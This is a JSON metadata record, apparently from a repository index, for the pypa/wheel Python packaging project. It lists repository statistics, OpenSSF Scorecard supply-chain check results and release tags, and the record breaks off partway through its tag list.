{"id":369034,"url":"https://github.com/pypa/wheel","last_synced_at":"2026-06-21T00:30:47.197Z","repository":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2026-05-10T09:28:18.000Z","size":1870,"stargazers_count":560,"open_issues_count":9,"forks_count":181,"subscribers_count":28,"default_branch":"main","last_synced_at":"2026-06-04T00:19:19.884Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2026-05-15T11:09:49.000Z","dependencies_parsed_at":"2026-03-18T00:02:18.368Z","dependency_job_id":null,"html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":71,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":33984380,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-06T02:00:07.033Z","response_time":107,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"owner":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":59,"last_synced_at":"2026-06-13T00:24:34.781Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":91028,"followers":2335,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2026-06-13T00:24:34.781Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"packages":[{"id":6158646,"name":"py3-wheel-doc","ecosystem":"alpine","description":"built-package format for Python (documentation)","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2021-04-05T18:18:10.000Z","latest_release_published_at":"2021-04-05T18:18:10.000Z","latest_release_number":"0.36.2-r2","last_synced_at":"2026-04-01T13:25:01.339Z","created_at":"2023-01-31T23:41:05.558Z","updated_at":"2026-04-01T13:25:01.339Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.15/main/x86_64/py3-wheel-doc","install_command":"apk add py3-wheel-doc","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"46